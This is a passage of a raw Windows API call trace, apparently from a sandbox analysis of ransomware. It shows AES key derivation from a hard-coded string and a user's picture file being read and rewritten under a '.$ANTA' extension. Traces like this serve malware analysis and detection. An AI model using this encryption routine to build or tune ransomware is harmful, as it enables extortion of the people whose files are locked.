WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0088.521] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0088.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0088.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0088.521] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca730, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0088.521] CryptHashData (hHash=0x41ac600, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0088.521] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.521] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0088.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0088.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca568, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0088.521] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac640) returned 1 [0088.522] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.522] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0088.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0088.522] CryptDestroyHash (hHash=0x41ac600) returned 1 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0088.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0088.523] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0088.523] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0088.523] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0088.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0088.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0088.523] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\h5_ZfAY-6STnb.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\h5_zfay-6stnb.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0088.524] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.524] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0088.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0088.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0088.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0088.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0088.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0088.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.524] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0088.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0088.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0088.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0088.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0088.524] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0088.524] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0088.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0088.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0088.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0088.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0088.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0088.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431ded8 [0088.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0088.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0088.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431ded8 | out: hHeap=0x1780000) returned 1 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0088.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0088.526] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0088.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0088.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0088.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0088.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0088.526] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\h5_ZfAY-6STnb.gif.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\h5_zfay-6stnb.gif.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0088.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0088.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0088.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0088.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0088.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0088.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0088.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0088.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.527] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0088.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0088.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0088.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0088.527] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0088.527] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0088.527] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0088.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0088.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0088.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0088.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0088.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e09020 [0088.531] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0088.531] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0088.533] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x880d, lpOverlapped=0x0) returned 1 [0088.534] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0088.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0088.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1880d) returned 0x4516010 [0088.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e09020 | out: hHeap=0x1780000) returned 1 [0088.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0088.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1880d) returned 0x452e828 [0088.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0088.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.537] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0088.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0088.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0088.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0088.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1880d) returned 0x4516010 [0088.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0088.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0088.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0088.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.538] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.538] RtlAllocateHeap 